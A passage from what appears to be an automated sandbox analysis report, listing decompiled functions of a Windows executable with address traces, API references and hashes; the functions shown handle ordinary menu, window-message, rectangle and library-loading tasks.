								if( *_t121() >= 0 && E00CB277F(_t95, _t106, _t109, GetParent( *(_t95 + 0x20))) != 0) {
									SendMessageA( *(E00CB277F(_t95, _t106, _t109, GetParent( *(_t95 + 0x20))) + 0x20),  *0xe885cc, _v16, 0);
								}
							}
						}
					}
					_t72 = _v8;
					 *0xe17a64(_t72);
					 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
					goto L19;
				} else {
					 *0xe17a64(_v8);
					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x188))))();
					L19:
					 *0xe17a64(_t111);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 8))))();
					goto L20;
				}
			}

0x00cd2af7
0x00cd2b08
0x00cd2b0a
0x00cd2b15
0x00cd2b1b
0x00cd2b2c
0x00cd2b34
0x00cd2cff
0x00cd2cff
0x00cd2cff
0x00cd2b3a
0x00cd2b3d
0x00cd2b42
0x00000000
0x00000000
0x00cd2b48
0x00cd2b49
0x00cd2b4d
0x00cd2cfb
0x00000000
0x00cd2cfb
0x00cd2b53
0x00cd2b56
0x00cd2b5b
0x00000000
0x00000000
0x00cd2b69
0x00cd2b6f
0x00cd2b73
0x00000000
0x00000000
0x00cd2b7c
0x00cd2b8f
0x00cd2b95
0x00cd2b9f
0x00cd2bd8
0x00cd2be2
0x00000000
0x00000000
0x00cd2be8
0x00cd2bee
0x00cd2bf3
0x00cd2bf9
0x00cd2c0b
0x00cd2c0e
0x00cd2c10
0x00cd2c1a
0x00cd2c2d
0x00cd2c2f
0x00cd2c34
0x00cd2c46
0x00cd2c4a
0x00cd2c58
0x00cd2c5f
0x00cd2c69
0x00cd2c61
0x00cd2c61
0x00cd2c61
0x00cd2c6c
0x00cd2c6f
0x00cd2c72
0x00cd2c77
0x00cd2c7a
0x00cd2c7d
0x00cd2c80
0x00cd2c83
0x00cd2c8c
0x00cd2c94
0x00cd2c96
0x00cd2ca0
0x00cd2cd2
0x00cd2cd2
0x00cd2ca0
0x00cd2c34
0x00cd2c1a
0x00cd2cd8
0x00cd2ce3
0x00cd2ce9
0x00000000
0x00cd2ba1
0x00cd2bae
0x00cd2bb6
0x00cd2ceb
0x00cd2cf3
0x00cd2cf9
0x00000000
0x00cd2cf9

APIs

SendMessageA.USER32(?,00001005,00000000,?), ref: 00CD2B2C
CreatePopupMenu.USER32(?,?,00000001,?,00E3EEAC,00000000,?,?,00000001,?,?), ref: 00CD2BE8
GetMenuDefaultItem.USER32 ref: 00CD2C27
GetParent.USER32(?), ref: 00CD2C51
GetParent.USER32(?), ref: 00CD2CA5
GetParent.USER32(?), ref: 00CD2CB8
SendMessageA.USER32(?,?,00000000,00000000), ref: 00CD2CD2

Strings

$, xrefs: 00CD2C4A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$MenuMessageSend$CreateDefaultItemPopup
String ID: $
API String ID: 3883924376-3993045852
Opcode ID: effc8abf8fb59fb80931f1be49a32ad0925284dd0d626bbf3bbc8c5e5140eed3
Instruction ID: a0db95b65fbea6eadd03debae322365c4f901810abbdba441ca67741d4de6f12
Opcode Fuzzy Hash: effc8abf8fb59fb80931f1be49a32ad0925284dd0d626bbf3bbc8c5e5140eed3
Instruction Fuzzy Hash: 2D515B71A00225AFDB109FA5CD48A9DBBB5FF48B01F1441AAEA55B73A0DB319E41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD628 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00CFD628(long __ecx, void* __edx, void* __esi, char _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				struct tagPOINT _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t45;
				int _t49;
				intOrPtr _t56;
				int _t57;
				int _t59;
				intOrPtr _t61;
				int _t67;
				intOrPtr _t80;
				intOrPtr* _t81;
				int _t83;
				long _t84;
				int _t87;
				intOrPtr _t98;
				void* _t99;
				intOrPtr* _t100;
				long _t101;
				void* _t103;
				intOrPtr _t111;

				_t103 = __esi;
				_t99 = __edx;
				_t84 = __ecx;
				_t81 = _a8;
				_t100 = __ecx;
				if(_t81 != 0) {
					_t56 =  *((intOrPtr*)(__ecx + 0xfc));
					if(_t56 != 0) {
						_t56 =  *((intOrPtr*)(_t56 + 0x20));
					}
					if( *_t81 != _t56) {
						_t57 =  *(_t100 + 0xf8);
						__eflags = _t57;
						if(_t57 == 0) {
							L19:
							return 0;
						}
						_t59 =  *(_t57 + 0x20);
						__eflags = _t59;
						if(_t59 == 0) {
							goto L19;
						}
						__eflags =  *_t81 - _t59;
						if( *_t81 != _t59) {
							goto L19;
						}
						_t83 =  *0xe885fc; // 0x0
						__eflags = _t83;
						if(_t83 == 0) {
							_t83 = E00CB2BE8(_t84, _t103);
						}
						_t61 = E00CB277F(_t83, _t84, _t99, GetParent( *(_t100 + 0x20)));
						_v16.x = _v16.x & 0x00000000;
						_v16.y = _v16.y & 0x00000000;
						_v8 = _t61;
						 *0xe87d44 = _t100;
						GetCursorPos( &_v16);
						ScreenToClient( *(_t100 + 0x20),  &_v16);
						_push(_v16.y);
						_t67 = PtInRect(_t100 + 0x200, _v16);
						__eflags = _t67;
						if(_t67 != 0) {
							goto L19;
						}
						 *0xe17a64( &_v16, _t103);
						 *0xe87d48 =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x218))))();
						E00CA2C0A(_t83, 0xe87d40);
						_t111 = _v8;
						SendMessageA( *(_t111 + 0x20),  *0xe87d3c, 0, 0xe87d40);
						__eflags = _t111 - _t83;
						if(_t111 != _t83) {
							__eflags = _t83;
							if(_t83 != 0) {
								SendMessageA( *(_t83 + 0x20),  *0xe87d3c, 0, 0xe87d40);
							}
						}
						_t98 =  *0xe87d40; // 0xe681e4
						__eflags =  *(_t98 - 0xc);
						if( *(_t98 - 0xc) == 0) {
							goto L19;
						} else {
							 *((intOrPtr*)(_a8 + 0xc)) = _t98;
							L6:
							return 1;
						}
					}
					_t84 = 0xe87d40;
					if(E00CA2A90(0xe87d40, 0x3ea0) != 0) {
						_t80 =  *0xe87d40; // 0xe681e4
						 *((intOrPtr*)(_t81 + 0xc)) = _t80;
						goto L6;
					}
				}
				E00CAA4E7(_t81, _t84, _t100, _t103, __eflags);
				asm("int3");
				_push(_t81);
				_t101 = _t84;
				_t45 = E00CB236A(_t81, _t84, __eflags, _t100);
				__eflags =  *(_t101 + 0x8c);
				if( *(_t101 + 0x8c) != 0) {
					 *0xe17a64( &_a4, _t103);
					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x218))))();
					_t87 = _t49;
					__eflags = _t87;
					if(_t87 < 0) {
						__eflags = _t87 -  *((intOrPtr*)(_t101 + 0xc0));
						if(_t87 !=  *((intOrPtr*)(_t101 + 0xc0))) {
							L31:
							return _t49;
						}
						L28:
						 *0xe17a64(_t87);
						_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x1b0))))();
						__eflags = _t49;
						if(_t49 != 0) {
							__eflags =  *(_t49 + 0x20);
							if( *(_t49 + 0x20) != 0) {
								_t49 = E00CB7A0A(0, _t49, _t99);
							}
						}
						goto L31;
					}
					__eflags = _t87 -  *((intOrPtr*)(_t101 + 0xc0));
					if(_t87 ==  *((intOrPtr*)(_t101 + 0xc0))) {
						goto L28;
					}
					 *(_t101 + 0x1ec) = 0;
					 *((intOrPtr*)(_t101 + 0x1f0)) = 1;
					 *((intOrPtr*)(_t101 + 0x24c)) = 0;
					 *0xe17a64(_t87);
					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x214))))();
					 *((intOrPtr*)(_t101 + 0x1f0)) = 0;
					 *((intOrPtr*)(_t101 + 0x24c)) = 0;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags =  *(_t101 + 0x1ec);
						if( *(_t101 + 0x1ec) == 0) {
							 *0xe17a64( *((intOrPtr*)(_t101 + 0xc0)));
							_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x270))))();
						}
						 *(_t101 + 0x1ec) = 0;
					}
					goto L31;
				}
				return _t45;
			}

0x00cfd628
0x00cfd628
0x00cfd628
0x00cfd62f
0x00cfd633
0x00cfd637
0x00cfd63d
0x00cfd645
0x00cfd647
0x00cfd647
0x00cfd64c
0x00cfd676
0x00cfd67c
0x00cfd67e
0x00cfd76a
0x00000000
0x00cfd76a
0x00cfd684
0x00cfd687
0x00cfd689
0x00000000
0x00000000
0x00cfd68f
0x00cfd691
0x00000000
0x00000000
0x00cfd697
0x00cfd69d
0x00cfd69f
0x00cfd6a6
0x00cfd6a6
0x00cfd6b2
0x00cfd6b7
0x00cfd6bb
0x00cfd6bf
0x00cfd6c6
0x00cfd6cc
0x00cfd6d9
0x00cfd6df
0x00cfd6ec
0x00cfd6f2
0x00cfd6f4
0x00000000
0x00000000
0x00cfd705
0x00cfd714
0x00cfd71b
0x00cfd721
0x00cfd730
0x00cfd736
0x00cfd739
0x00cfd73b
0x00cfd73d
0x00cfd74e
0x00cfd74e
0x00cfd73d
0x00cfd754
0x00cfd75a
0x00cfd75d
0x00000000
0x00cfd75f
0x00cfd762
0x00cfd66d
0x00000000
0x00cfd66f
0x00cfd75d
0x00cfd653
0x00cfd65f
0x00cfd665
0x00cfd66a
0x00000000
0x00cfd66a
0x00cfd65f
0x00cfd771
0x00cfd776
0x00cfd77a
0x00cfd77c
0x00cfd77e
0x00cfd785
0x00cfd78b
0x00cfd7a0
0x00cfd7a8
0x00cfd7aa
0x00cfd7ac
0x00cfd7ae
0x00cfd81d
0x00cfd823
0x00cfd84a
0x00000000
0x00cfd84a
0x00cfd825
0x00cfd830
0x00cfd838
0x00cfd83a
0x00cfd83c
0x00cfd83e
0x00cfd841
0x00cfd845
0x00cfd845
0x00cfd841
0x00000000
0x00cfd83c
0x00cfd7b0
0x00cfd7b6
0x00000000
0x00000000
0x00cfd7bb
0x00cfd7c1
0x00cfd7d3
0x00cfd7d9
0x00cfd7e1
0x00cfd7e3
0x00cfd7e9
0x00cfd7ef
0x00cfd7f1
0x00cfd7f3
0x00cfd7f9
0x00cfd80b
0x00cfd813
0x00cfd813
0x00cfd815
0x00cfd815
0x00000000
0x00cfd7f1
0x00cfd84e

APIs

GetParent.USER32(?), ref: 00CFD6AB
GetCursorPos.USER32(00000000), ref: 00CFD6CC
ScreenToClient.USER32 ref: 00CFD6D9
PtInRect.USER32(?,00000000,00000000), ref: 00CFD6EC
SendMessageA.USER32(00000000,00000000,00E87D40), ref: 00CFD730
SendMessageA.USER32(?,00000000,00E87D40), ref: 00CFD74E

Strings

@}, xrefs: 00CFD653
@}, xrefs: 00CFD70F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$ClientCursorParentRectScreen
String ID: @}$@}
API String ID: 4164469669-1009487753
Opcode ID: 54865106f69ca35d7b605da7700345f49094bd13771a68199dab58cf15963313
Instruction ID: 1ef7d6d5143c6095ac2bc202c50098552a66e84db201a7f95121d40e07d896eb
Opcode Fuzzy Hash: 54865106f69ca35d7b605da7700345f49094bd13771a68199dab58cf15963313
Instruction Fuzzy Hash: 3451D831704206EFCB549F66C884ABDB7BAFF49701F10816AE91AD7250DB309E05CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD024 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00CCD024(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t86;
				signed int _t93;
				signed int _t94;
				struct tagRECT* _t98;
				intOrPtr _t99;
				intOrPtr _t119;
				struct tagRECT* _t120;
				intOrPtr* _t123;
				struct tagRECT* _t124;
				void* _t127;
				void* _t128;

				_t128 = __eflags;
				_push(8);
				E00DDD52C(0xe09b1d, __ebx, __edi, __esi);
				_t119 = __ecx;
				 *((intOrPtr*)(_t127 - 0x10)) = __ecx;
				E00CB079B(__ecx);
				 *(_t127 - 4) =  *(_t127 - 4) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0xe1d1b8;
				E00D0917C(__ebx, __ecx + 0x80, __ecx, __esi, _t128);
				 *(_t127 - 4) = 1;
				E00D22035(_t119 + 0x120, _t128);
				 *(_t127 - 4) = 2;
				E00D22C4A(_t119 + 0x1d8);
				_t123 = _t119 + 0x278;
				 *(_t127 - 4) = 3;
				 *((intOrPtr*)(_t127 - 0x14)) = _t123;
				E00CB079B(_t123);
				 *_t123 = 0xe1cfe8;
				E00CA67E1(_t119 + 0x310);
				E00CA67E1(_t119 + 0x314);
				 *((intOrPtr*)(_t119 + 0x320)) = 0xe19a40;
				 *((intOrPtr*)(_t119 + 0x324)) = 0;
				_t98 = _t119 + 0x328;
				_t98->left = 0;
				_t120 = _t119 + 0x368;
				_t98->top = 0;
				_t98->right = 0;
				_t98->bottom = 0;
				_t124 =  *((intOrPtr*)(_t127 - 0x10)) + 0x378;
				_t120->left = 0;
				_t120->top = 0;
				_t120->right = 0;
				_t120->bottom = 0;
				_t124->left = 0;
				_t124->top = 0;
				_t124->right = 0;
				_t124->bottom = 0;
				E00CCCFFE( *((intOrPtr*)(_t127 - 0x10)) + 0x3a0, 0xa);
				E00CCCFFE( *((intOrPtr*)(_t127 - 0x10)) + 0x3bc, 0xa);
				_t86 =  *((intOrPtr*)(_t127 - 0x10));
				 *((intOrPtr*)(_t86 + 0x400)) = 0;
				 *((intOrPtr*)(_t86 + 0x3fc)) = 0xe1966c;
				 *(_t86 + 0x338) =  *(_t86 + 0x338) | 0xffffffff;
				 *(_t127 - 4) = 0xa;
				 *((intOrPtr*)(_t86 + 0x31c)) = 0;
				 *((intOrPtr*)(_t86 + 0x344)) = 0;
				 *((intOrPtr*)(_t86 + 0x348)) = 0;
				 *((intOrPtr*)(_t86 + 0x2f8)) = 1;
				 *((intOrPtr*)(_t86 + 0x2fc)) = 0;
				 *((intOrPtr*)(_t86 + 0x33c)) = 3;
				 *((intOrPtr*)(_t86 + 0x304)) = 0;
				 *((intOrPtr*)(_t86 + 0x308)) = 0;
				SetRectEmpty(_t98);
				_t99 =  *((intOrPtr*)(_t127 - 0x10));
				 *(_t99 + 0x358) =  *(_t99 + 0x358) & 0x00000000;
				SetRectEmpty(_t120);
				SetRectEmpty(_t124);
				 *((intOrPtr*)(_t99 + 0x354)) = 0;
				 *((intOrPtr*)(_t99 + 0x350)) = 0;
				 *((intOrPtr*)(_t99 + 0x35c)) = 0;
				 *((intOrPtr*)(_t99 + 0x360)) = 0;
				 *((intOrPtr*)(_t99 + 0x364)) = 0;
				 *((intOrPtr*)(_t99 + 0x3d8)) = 0;
				 *((intOrPtr*)(_t99 + 0x390)) = 0;
				 *((intOrPtr*)(_t99 + 0x340)) = 0;
				 *((intOrPtr*)(_t99 + 0x300)) = 1;
				 *((intOrPtr*)(_t99 + 0x388)) = 0;
				 *((intOrPtr*)(_t99 + 0x38c)) = 0;
				_push(E00DEC1A0(0xe1d3c8));
				E00CA2CD7(_t99, _t99 + 0x310, 0, 0xe1d3c8, 0xe1d3c8);
				_push(E00DEC1A0(0xe1d3d0));
				_t93 = E00CA2CD7(_t99, _t99 + 0x314, 0, 0xe1d3d0, 0xe1d3d0);
				 *((char*)(_t99 + 0x318)) = 0x2c;
				 *((intOrPtr*)(_t99 + 0x394)) = 0;
				_t94 = _t93 | 0xffffffff;
				 *((intOrPtr*)(_t99 + 0x398)) = 1;
				 *(_t99 + 0x3e0) = _t94;
				 *(_t99 + 0x3e4) = _t94;
				 *(_t99 + 0x3e8) = _t94;
				 *(_t99 + 0x3ec) = _t94;
				 *(_t99 + 0x3f0) = _t94;
				 *(_t99 + 0x3f4) = _t94;
				 *(_t99 + 0x3f8) = _t94;
				 *((intOrPtr*)(_t99 + 0x39c)) = 1;
				 *((intOrPtr*)(_t99 + 0x30c)) = 0;
				 *((intOrPtr*)(_t99 + 0x404)) = 0;
				 *((char*)(_t99 + 0x24)) = 1;
				return E00DDD4FA(_t99);
			}

0x00ccd024
0x00ccd024
0x00ccd02b
0x00ccd030
0x00ccd032
0x00ccd035
0x00ccd03a
0x00ccd044
0x00ccd04a
0x00ccd055
0x00ccd059
0x00ccd064
0x00ccd068
0x00ccd06d
0x00ccd073
0x00ccd079
0x00ccd07c
0x00ccd081
0x00ccd08d
0x00ccd098
0x00ccd09f
0x00ccd0a9
0x00ccd0b2
0x00ccd0b8
0x00ccd0ba
0x00ccd0c0
0x00ccd0c3
0x00ccd0c6
0x00ccd0c9
0x00ccd0cf
0x00ccd0d1
0x00ccd0d4
0x00ccd0d7
0x00ccd0da
0x00ccd0dc
0x00ccd0df
0x00ccd0e2
0x00ccd0ed
0x00ccd0fd
0x00ccd102
0x00ccd107
0x00ccd10d
0x00ccd117
0x00ccd11f
0x00ccd123
0x00ccd129
0x00ccd12f
0x00ccd135
0x00ccd13f
0x00ccd145
0x00ccd14f
0x00ccd155
0x00ccd15b
0x00ccd161
0x00ccd165
0x00ccd16c
0x00ccd173
0x00ccd180
0x00ccd187
0x00ccd18d
0x00ccd193
0x00ccd199
0x00ccd19f
0x00ccd1a5
0x00ccd1ab
0x00ccd1b1
0x00ccd1bb
0x00ccd1c1
0x00ccd1cd
0x00ccd1d5
0x00ccd1e6
0x00ccd1ee
0x00ccd1f5
0x00ccd1fd
0x00ccd203
0x00ccd206
0x00ccd20c
0x00ccd212
0x00ccd218
0x00ccd21e
0x00ccd224
0x00ccd22a
0x00ccd230
0x00ccd238
0x00ccd23e
0x00ccd244
0x00ccd24a
0x00ccd252

APIs

__EH_prolog3.LIBCMT ref: 00CCD02B

Part of subcall function 00D0917C: __EH_prolog3.LIBCMT ref: 00D09183

Part of subcall function 00D22C4A: SetRectEmpty.USER32(?), ref: 00D22C7F

SetRectEmpty.USER32(?), ref: 00CCD15B
SetRectEmpty.USER32 ref: 00CCD16C
SetRectEmpty.USER32(?), ref: 00CCD173
_strlen.LIBCMT ref: 00CCD1C7
_strlen.LIBCMT ref: 00CCD1E0

Strings

False, xrefs: 00CCD1DA, 00CCD1DF, 00CCD1E7
True, xrefs: 00CCD17B, 00CCD186, 00CCD1CE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyRect$H_prolog3_strlen
String ID: False$True
API String ID: 4048534651-1895882422
Opcode ID: 04b9729c084af712148527e4a2aa080db6bf61c3a0b14d87e2d0bde11a7d33c0
Instruction ID: d28cbc0a84fee88fa53f4f6da9453947386b172b83272c1860e896cf90158491
Opcode Fuzzy Hash: 04b9729c084af712148527e4a2aa080db6bf61c3a0b14d87e2d0bde11a7d33c0
Instruction Fuzzy Hash: 0651EFB09052419FCB0ADF29D485BE9BBE8BF58314F1881BEE81D9B396CB741244CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB5ED Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 118
libraryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00CAB5ED(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t27;
				long _t38;
				long _t42;
				intOrPtr* _t50;
				WCHAR* _t53;
				intOrPtr* _t54;
				void* _t56;
				intOrPtr _t58;
				void* _t61;
				void* _t65;

				_push(0x268);
				_push(0xe56d38);
				E00DDD610(__ebx, __edi, __esi);
				_t58 = 0;
				 *((intOrPtr*)(_t61 - 0x230)) = 0;
				_t65 =  *0xe85164 - _t58; // 0x0
				if(_t65 != 0 ||  *0xe681e8 != 0xffffffff) {
					L22:
					_t58 = 1;
				} else {
					if(E00CAB59B(__ecx, 0x80000010, 0xe681e8, 0, 1, _t61 - 0x238, 8, 0) == 0) {
						L23:
						 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0x10));
						return _t58;
					}
					_t27 =  *((intOrPtr*)(_t61 - 0x238));
					if(_t27 != 0) {
						L18:
						 *0xe681e8 = _t27;
						_t49 = _t61 - 0x230;
						if(E00CAB30A(_t61 - 0x230, _t27, _t61 - 0x230) != 0) {
							 *((intOrPtr*)(_t61 - 4)) = _t58;
							 *((intOrPtr*)(_t61 - 0x278)) = 0x40;
							_t53 = L"Comctl32.dll";
							if(E00CAB3D5(_t49, _t58, _t58, 2, _t53, _t61 - 0x278) != 0) {
								LoadLibraryW(_t53);
							}
							 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
							E00CAB7AC(_t58);
						}
						goto L22;
					}
					_t54 = E00CAB549(0xe18088, 0xe85188, "GetModuleHandleExW");
					if(_t54 == 0) {
						goto L23;
					}
					_t50 = _t54;
					 *0xe17a64(6, 0xe681e8, _t61 - 0x22c);
					if( *_t54() == 0) {
						goto L23;
					}
					_t38 = GetModuleFileNameW( *(_t61 - 0x22c), _t61 - 0x228, 0x105);
					if(_t38 == 0) {
						goto L23;
					}
					if(_t38 < 0x105) {
						 *((intOrPtr*)(_t61 - 0x258)) = 0x20;
						 *((intOrPtr*)(_t61 - 0x254)) = 0x88;
						 *((intOrPtr*)(_t61 - 0x250)) = _t61 - 0x228;
						_t56 = 3;
						 *(_t61 - 0x244) = 0x105;
						 *(_t61 - 0x23c) =  *(_t61 - 0x22c);
						_t27 = E00CAB34D(_t50, _t61 - 0x258);
						 *((intOrPtr*)(_t61 - 0x238)) = _t27;
						if(_t27 != 0xffffffff) {
							L17:
							 *0xe8516c = 1;
							goto L18;
						}
						_t42 = GetLastError();
						if(_t42 == 0x714 || _t42 == 0x715 || _t42 == 0x717 || _t42 == 0x716 || _t42 == 2 || _t42 == _t56) {
							_t27 = _t58;
							 *((intOrPtr*)(_t61 - 0x238)) = _t27;
							goto L17;
						} else {
							goto L23;
						}
					}
					SetLastError(0x6f);
				}
			}

0x00cab5ed
0x00cab5f2
0x00cab5f7
0x00cab5fc
0x00cab5fe
0x00cab604
0x00cab60a
0x00cab795
0x00cab797
0x00cab61d
0x00cab63c
0x00cab798
0x00cab79d
0x00cab7a9
0x00cab7a9
0x00cab642
0x00cab64a
0x00cab745
0x00cab745
0x00cab74a
0x00cab759
0x00cab75b
0x00cab75e
0x00cab76f
0x00cab780
0x00cab783
0x00cab783
0x00cab789
0x00cab790
0x00cab790
0x00000000
0x00cab759
0x00cab664
0x00cab668
0x00000000
0x00000000
0x00cab678
0x00cab67a
0x00cab684
0x00000000
0x00000000
0x00cab69d
0x00cab6a5
0x00000000
0x00000000
0x00cab6ad
0x00cab6bc
0x00cab6c6
0x00cab6d6
0x00cab6de
0x00cab6df
0x00cab6eb
0x00cab6f8
0x00cab6fd
0x00cab706
0x00cab73b
0x00cab73b
0x00000000
0x00cab73b
0x00cab708
0x00cab713
0x00cab733
0x00cab735
0x00000000
0x00000000
0x00000000
0x00000000
0x00cab713
0x00cab6b1
0x00cab6b1

APIs

LoadLibraryW.KERNEL32(Comctl32.dll), ref: 00CAB783

Part of subcall function 00CAB549: GetProcAddress.KERNEL32(?,?), ref: 00CAB577

GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,00CAB450,?,?,?,?,?,?,?,00E56D18,00000010), ref: 00CAB69D
SetLastError.KERNEL32(0000006F,?,?,00CAB450,?,?,?,?,?,?,?,00E56D18,00000010), ref: 00CAB6B1
GetLastError.KERNEL32 ref: 00CAB708

Strings

, xrefs: 00CAB6BC
Comctl32.dll, xrefs: 00CAB76F, 00CAB774, 00CAB782
GetModuleHandleExW, xrefs: 00CAB650
@, xrefs: 00CAB75E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
String ID: $@$Comctl32.dll$GetModuleHandleExW
API String ID: 3640817601-4183358198
Opcode ID: f4747d098234af39ab9f2ce05e88fc3005599ed46cc8100d8fbd50a9ac06d0b2
Instruction ID: 4aa36039edebfc15f40dd9e1a42c4f67c3ef1490c50c3da3daea48795b940c4b
Opcode Fuzzy Hash: f4747d098234af39ab9f2ce05e88fc3005599ed46cc8100d8fbd50a9ac06d0b2
Instruction Fuzzy Hash: 2641C4719013159ADB709BA49C8DBDD77B8EB86754F100696F428F6191DBB48F84CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00D8130B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00D8130B(void* __ebx, void* __ecx, signed int _a4) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v24;
				signed int* _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				signed int _t10;
				signed int _t12;
				signed int _t14;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t22;
				signed int _t23;
				void* _t26;
				void* _t30;
				signed int _t31;
				signed int* _t32;
				signed int* _t37;
				signed int _t40;
				signed int _t41;
				signed int _t44;
				signed int _t45;
				void* _t47;
				void* _t49;

				_t30 = __ecx;
				if( *0xe68570 == 0) {
					L10:
					return _t9;
				} else {
					if( *0xe688b0 != 0xfffffffe) {
						_t10 = _a4;
						 *0xe688b0 = _t10;
						_t12 =  ~(_t10 + 1);
						asm("sbb eax, eax");
						 *0xe8880c =  *0xe8880c & _t12;
						__eflags =  *0xe8880c;
						return _t12;
					}
					_t40 = _a4;
					if(_t40 == 0xffffffff) {
						goto L10;
					} else {
						EnterCriticalSection(0xe887f4);
						if( *0xe8880c == 0) {
							_t26 = E00DEC08F(_t30, 0xd8139c, 0, 0);
							 *0xe8880c = _t26;
							if(_t26 == 0 || _t26 == 0xffffffff) {
								 *0xe8880c =  *0xe8880c & 0x00000000;
								__eflags =  *0xe8880c;
							} else {
								_t26 = SetThreadPriority(_t26, 0xffffffff);
								 *0xe688b0 = _t40;
							}
							LeaveCriticalSection(0xe887f4);
							return _t26;
						}
						E00CAA4E7(__ebx, _t30, 0xe887f4, _t40, __eflags);
						asm("int3");
						_t14 =  *0xe688b0; // 0xfffffffe
						_push(_t40);
						_push(0xe887f4);
						_t41 = 0;
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							_push(__ebx);
							do {
								_t22 = _t14;
								__eflags = _t22;
								if(_t22 == 0) {
									_t41 = _t41 + 1;
									__eflags = _t41;
									goto L20;
								} else {
									_t23 = _t22 - 1;
									__eflags = _t23;
									if(_t23 == 0) {
										PlaySoundA("MenuCommand", 0, 0x12002);
										goto L17;
									} else {
										__eflags = _t23 != 1;
										if(_t23 != 1) {
											L20:
											__eflags = _t41 - 0x7d0;
											if(_t41 == 0x7d0) {
												 *0xe688b0 =  *0xe688b0 | 0xffffffff;
												__eflags =  *0xe688b0;
											}
										} else {
